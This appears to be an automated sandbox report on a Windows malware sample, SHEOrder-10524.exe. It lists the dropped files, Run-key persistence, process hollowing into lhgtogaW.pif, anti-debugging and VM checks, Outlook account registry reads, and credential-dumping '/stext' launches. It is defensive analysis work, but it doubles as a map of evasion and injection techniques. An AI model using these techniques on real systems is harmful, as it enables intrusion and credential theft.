                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: SHEOrder-10524.exe - Static file information: File size 1646592 > 1048576
                  Source: SHEOrder-10524.exe - Static PE information: Raw size of .data is bigger than: 0x100000 < 0x114c00
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

                  Data Obfuscation

                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Unpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Unpacked PE file: 5.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Unpacked PE file: 6.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Unpacked PE file: 7.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Unpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack
                  Source: Yara match - File source: 0.2.SHEOrder-10524.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match - File source: 00000000.00000002.1719936963.0000000002315000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 0000000B.00000002.1942171245.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: lhgtogaW.pif.0.dr - Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028D7AC0
                  Source: easinvoker.exe.0.dr - Static PE information: section name: .imrsiv
                  Source: netutils.dll.0.dr - Static PE information: section name: .xdata
                  Source: netutils.dll.0.dr - Static PE information: section name: /4
                  Source: netutils.dll.0.dr - Static PE information: section name: /19
                  Source: netutils.dll.0.dr - Static PE information: section name: /31
                  Source: netutils.dll.0.dr - Static PE information: section name: /45
                  Source: netutils.dll.0.dr - Static PE information: section name: /57
                  Source: netutils.dll.0.dr - Static PE information: section name: /70
                  Source: netutils.dll.0.dr - Static PE information: section name: /81
                  Source: netutils.dll.0.dr - Static PE information: section name: /92
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028EA2F4 push 028EA35Fh; ret 0_2_028EA357
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028C32F0 push eax; ret 0_2_028C332C
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028DD20C push ecx; mov dword ptr [esp], edx 0_2_028DD211
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028C6374 push 028C63CFh; ret 0_2_028C63C7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028C6372 push 028C63CFh; ret 0_2_028C63C7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028EA0AC push 028EA125h; ret 0_2_028EA11D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D3028 push 028D3075h; ret 0_2_028D306D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D3027 push 028D3075h; ret 0_2_028D306D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028EA1F8 push 028EA288h; ret 0_2_028EA280
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028EA144 push 028EA1ECh; ret 0_2_028EA1E4
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028C673E push 028C6782h; ret 0_2_028C677A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028C6740 push 028C6782h; ret 0_2_028C677A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028CC528 push ecx; mov dword ptr [esp], edx 0_2_028CC52D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028CD55C push 028CD588h; ret 0_2_028CD580
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028CCBA8 push 028CCD2Eh; ret 0_2_028CCD26
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D9B58 push 028D9B90h; ret 0_2_028D9B88
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028E9B70 push 028E9D8Eh; ret 0_2_028E9D86
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D78C8 push 028D7945h; ret 0_2_028D793D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028CC8D6 push 028CCD2Eh; ret 0_2_028CCD26
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D6904 push 028D69AFh; ret 0_2_028D69A7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D6902 push 028D69AFh; ret 0_2_028D69A7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D5E38 push ecx; mov dword ptr [esp], edx 0_2_028D5E3A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D2F1C push 028D2F92h; ret 0_2_028D2F8A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028EDF18 push eax; ret 0_2_028EDFE8
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D7CA8 push 028D7CE0h; ret 0_2_028D7CD8
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D7CA6 push 028D7CE0h; ret 0_2_028D7CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_00457106 push ecx; ret 4_2_00457119
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_0045B11A push esp; ret 4_2_0045B141
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_00457A28 push eax; ret 4_2_00457A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_00434E56 push ecx; ret 4_2_00434E69
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_274C2806 push ecx; ret 4_2_274C2819

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - File created: C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Windows\SysWOW64\extrac32.exe - File created: C:\Users\Public\Libraries\Wagotghl.PIF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_00406EB0 ShellExecuteW,URLDownloadToFileW, 4_2_00406EB0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - File created: C:\Users\Public\Libraries\easinvoker.exe
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - File created: C:\Users\Public\Libraries\netutils.dll
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Code function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 4_2_0041AA4A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wagotghl
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Code function: 0_2_028D9B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_028D9B94
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif - Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF - Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040F7A7 Sleep,ExitProcess,4_1_0040F7A7
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_1_0041A748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Window / User API: threadDelayed 614
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Window / User API: threadDelayed 9052
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Window / User API: foregroundWindowGot 1762
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-52545
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7460 | Thread sleep count: 130 > 30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7460 | Thread sleep time: -65000s >= -30000s
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464 | Thread sleep count: 614 > 30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464 | Thread sleep time: -1842000s >= -30000s
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464 | Thread sleep count: 9052 > 30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464 | Thread sleep time: -27156000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028C58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028C58CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_274C10F1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_1_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_1_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_1_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040783C FindFirstFileW,FindNextFileW,4_1_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_1_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_1_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752355443.00000000241B3000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795698080.00000000241B3000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795698080.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752355443.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: bhv1938.tmp.5.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000613000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000620000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW-spov-0006.spov-msedge.netLMEM@0
                  Source: bhv1938.tmp.5.dr | Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | API call chain: ExitProcess graph end node graph_0-36367
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | API call chain: ExitProcess graph end node graph_4-54448
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process information queried: ProcessInformation
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028D7AC0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h] 4_2_004432B5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C4AB4 mov eax, dword ptr fs:[00000030h] 4_2_274C4AB4
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004432B5 mov eax, dword ptr fs:[00000030h] 4_1_004432B5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411CFE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process token adjusted: Debug
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_274C2639
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_274C60E2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_274C2B1C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_004349F9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00434B47 SetUnhandledExceptionFilter,4_1_00434B47
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_0043BB22
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_00434FDC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 121A0000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 121A0000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory allocated: C:\Users\Public\Libraries\lhgtogaW.pif base: 1E060000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 4_2_004180EF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Section loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and write
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Section loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and write
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Section loaded: NULL target: C:\Users\Public\Libraries\lhgtogaW.pif protection: execute and read and write
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Section unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Section unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Section unmapped: C:\Users\Public\Libraries\lhgtogaW.pif base address: 400000
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Memory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 222008
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 36F008
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Memory written: C:\Users\Public\Libraries\lhgtogaW.pif base: 271008
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 4_2_00412117
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 4_1_00412117
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: 4_2_00419627 mouse_event, 4_2_00419627
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
